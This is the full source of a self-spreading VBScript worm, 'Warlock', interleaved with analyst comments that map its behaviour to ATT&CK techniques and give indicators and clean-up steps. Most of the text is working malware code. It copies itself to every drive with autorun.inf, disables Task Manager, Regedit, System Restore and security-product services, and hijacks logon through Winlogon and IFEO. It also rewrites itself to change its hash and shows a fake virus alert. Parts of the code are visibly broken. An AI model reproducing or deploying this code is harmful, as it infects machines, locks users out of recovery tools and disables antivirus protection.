
M4ST3RW4RL0CK.vbs _2Variant

' Analyst annotations (defensive review). The code below is unchanged from the listing.
' Summary of what the visible code does:
'   - reads its own source and copies it to the Windows folder and to the root of
'     every removable/fixed drive, together with an autorun.inf
'     (ATT&CK T1091, Replication Through Removable Media);
'   - writes a large set of registry values: logon persistence, policy restrictions
'     that remove the user's inspection tools, and redirection of security tools
'     (T1547.001, T1547.004, T1546.012, T1562.001, T1490);
'   - rewrites its own file on every pass, so its hash changes between runs.
' File-system indicators visible in the listing:
'   <WindowsFolder>\W4r10ck_zZ.txt.vbs, <drive>\W4r10ck_zZ.txt.vbs, <drive>\autorun.inf,
'   C:\payload.html, C:\poly.txt. The autorun.inf body names m4st3rW4r10ck.txt.vbs,
'   so both file names are worth hunting for.
' Errors are suppressed for the whole script: any statement that fails is skipped silently.
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,warlock,nt,check,sd,fso,inti,namaf
' Body of the autorun.inf written to each drive root further down.
' Mitigation: disable AutoRun for all drive types (NoDriveTypeAutoRun policy).
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe m4st3rW4r10ck.txt.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
' Drive type of the drive this copy runs from (FSO: 1 = removable, 2 = fixed).
' It decides whether the main loop below repeats.
check = mf.drive.drivetype
' Read the script's own source, line by line, into rekur (1 = ForReading, -2 = system default encoding).
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
' Main loop: everything down to "loop while check <> 1" is repeated.
do
' Copy into the Windows folder (GetSpecialFolder(0)).
' Attribute 32 = Archive only, set so an existing copy can be overwritten;
' attribute 39 = ReadOnly + Hidden + System + Archive, set after writing (T1564.001).
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\W4r10ck_zZ.txt.vbs")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\W4r10ck_zZ.txt.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\W4r10ck_zZ.txt.vbs")
tf.attributes = 39
' Same drop on every removable (1) or fixed (2) drive except A:, plus an autorun.inf
' in the drive root; both files end up read-only, hidden and system.
' Detection: script hosts creating autorun.inf or *.vbs files in a drive root.
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\W4r10ck_zZ.txt.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\W4r10ck_zZ.txt.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\W4r10ck_zZ.txt.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
' Image-file branch (bmp/jpg/gif/ico): hides the image with "attrib +h" through a
' temporary .bat file, then writes "<image>.vbs" containing a line that opens the
' image followed by this script's source.
' NOTE(review): "file" and "fso" are not assigned before this point in the visible
' listing, so treat this branch's runtime behaviour as unconfirmed.
If fso.GetExtensionName(file.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.path)="ico" then
on error resume next
set fso = createobject("scripting.filesystemobject")
set mvbswe = wscript.CreateObject("wscript.shell")
set tes = fso.opentextfile(Wscript.Scriptfullname,1)
scr = tes.readall
bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
dropper.Close
mvbswe.run bathelp
Fso.Deletefile bathelp
vbscopy = file.path & ".vbs"
Set dropper2 = Fso.Createtextfile(vbscopy, True)
dropper2.write "CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ").run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
' Writes C:\payload.html (a message page) and opens it with the default handler.
' NOTE(review): the string literals in this part look as if their HTML markup was lost
' when the page was extracted; one literal is split across several lines as a result.
set fso = createobject("scripting.filesystemobject")
set payload = fso.createtextfile("C:\payload.html",true)
payload.writeline "mst3rkefi/w32warlock"
payload.writeline ""
payload.writeline ""
payload.writeline "Your Computer has been Infected with : "
payload.writeline "

mst3rkefi/w32warlock Hahahha..........love SPENKA........

"
payload.writeline ""
payload.close
CreateObject("Wscript.shell").run "C:\payload.html"
' Registry section. Every value below is an indicator, and each one has to be reverted
' during clean-up; deleting the dropped files alone leaves the system restricted.
set warlock = createobject("WScript.Shell")
' Cosmetic: Internet Explorer window title.
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: ->WARLOCK THE MASTER OF LOTUS WORLD<- ::"
' Per-user policy restrictions: hide hidden files, remove Find, Folder Options, Run,
' context menus and Shut Down, and disable Registry Editor and Task Manager, which are
' the tools a user would reach for to inspect or remove the script (T1562.001).
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter", 1, "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter", 1, "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1, "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoVirtMemPage", 1, "REG_DWORD"
' Logon notice caption and text. The text is Indonesian, roughly: "The Warlock is
' sleeping; when it wakes up it will destroy your PC".
warlock.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THEWARLOCK_zZ"
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","The Warlock sedang Tidur, saat bangun dia akan menghancurkan PC kamu"
' Persistence: HKLM Run value "Systemdir" points at the copy in the Windows folder (T1547.001).
warlock.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\W4r10ck_zZ.txt.vbs"
' Image File Execution Options: a Debugger value of notepad.exe makes Windows start
' Notepad instead of the named program (T1546.012). Targets are administrative tools,
' generic installer names and PCMAV*.exe (by its name, an antivirus product).
' Detection: any Debugger value under Image File Execution Options on a non-developer host.
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
' NoDrives = 67108863 (0x3FFFFFF, 26 bits set): hides every drive letter A-Z in Explorer.
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD"
' Cosmetic markers (registered owner/organization, Run dialog history).
' On the lines that follow, everything after the first apostrophe outside a string is a
' VBScript comment and has no runtime effect; the trailing text appears to be fragments
' of script text.
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "wIN32WarlockKefi"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Bingung_vbs"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KeFiw32"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
' NOTE(review): DoEvents is a VB/VBA statement and is not defined anywhere in this listing.
DoEvents''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
' Second pass over the policy restrictions, adding tray context menu, wallpaper change,
' Windows-key shortcuts, Log Off and Control Panel. DisableSR = 1 turns off System
' Restore (T1490), so restore points cannot be relied on for recovery.
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
' Cosmetic: displayed user names, and the screen saver switched to the marquee saver
' with the author's text.
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Logon User Name", "Jablunt"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName", "Jablunt"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName", "Jablunt"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive", "1"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE", "C:\WINDOWS\system32\marquee.scr"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Attributes", "00011"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\BackgroundColor", "0 0 0"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\CharSet", "0"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Font", "Verdana"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Mode", "1"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Size", "24"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Speed", "3"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Text", "KeFiLhuPher virus !!!!!!"'shellexecute=wscript.exe " & namaf'
' Boot/logon hijack: Winlogon Userinit and Shell, BootExecute, ComSpec, SafeBoot
' AlternateShell and a list of service ImagePath values are all pointed at
' c:\windows\svchost.exe (T1547.004). The genuine svchost.exe lives in system32, so
' that path is itself an indicator.
' NOTE(review): nothing in the visible listing writes c:\windows\svchost.exe, and
' "inti" is declared but never assigned here.
' Remediation: restore Userinit and Shell to their defaults before the next logon,
' otherwise the session may fail to start. The service names include ones that look like
' security-product services (McShield, SAVScan, NSCService, ...), presumably so they
' fail to start; repair or reinstall the affected products after clean-up.
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\TextColor", "255 0 0"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell", "explorer.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell", "explorer.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\ComSpec", "%SystemRoot%\system32\cmd.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PugPlay\ImagePath", "%SystemRoot%\system32\services.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice\ImagePathservice", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NSCService\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVScan\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCDrv\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McDetect.exe\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTskshd.exe\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mcupdmgr.exe\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srservice\ImagePathservice", "c:\windows\svchost.exe " & inti
' Replaces the warning text stored for the "show protected files" and "hide file
' extensions" folder options with a fake virus alert.
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault", "Windows has detected virus you should format all hard drive for further analist contact us at www.Strees.com"
warlock.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\WarningIfNotDefault", "Windows has detected virus you should format all hard drive for further analist contact us at www.Strees.com"
' Resource exhaustion: requests 150 Word and 150 Excel automation objects per pass.
' Detection: wscript.exe spawning many WINWORD.EXE / EXCEL.EXE automation instances.
for i = 1 to 150
Set w = CreateObject("Word.application")
Set e = CreateObject("ExCeL.application")
next
' Builds a random string of 3 to 22 lowercase letters (character codes 97 to 118).
Randomize
for i = 1 to int(rnd * 20) + 3
a = chr(int(rnd * 22) + 97)
allchar = allchar & a
next
' Self-rewrite: copies the script's own lines to C:\poly.txt with the random string
' appended as comment text, then copies that file over the running script. The file
' content, and therefore its hash, changes on every pass, so hash-based indicators are
' unreliable for this sample; match on the registry values, the dropped file names and
' the constant strings instead.
set fso = createobject("scripting.filesystemobject")
set op = fso.opentextfile(wscript.scriptfullname,1)
set parser = fso.Createtextfile("C:\poly.txt",true)
do while mark <> "'Markerz"
mark = op.readline
checker = mid(mark,1,4)
if mark = lcase("'Markerz") or checker = lcase("ReM ") then poly = replace(mark,mark,mark)
if checker <> lcase("ReM ") and mark <> lcase("'Markerz") then poly = replace(mark,mark,mark & " '" & allchar & vbcrlf & "rem " & allchar)
parser.writeline poly
loop
fso.copyfile "C:\poly.txt",wscript.scriptfullname
op.close
parser.close
'markerz
' When the script does not run from a removable drive (check <> 1) it sleeps 200000 ms
' (200 s) and repeats the whole main loop, so the files and registry values above are
' written again on every pass. Clean-up therefore has to end the wscript.exe process
' first, before files are removed and values are reverted.
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
' Reached only when run from a removable drive: opens an Explorer window with the
' script file selected.
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
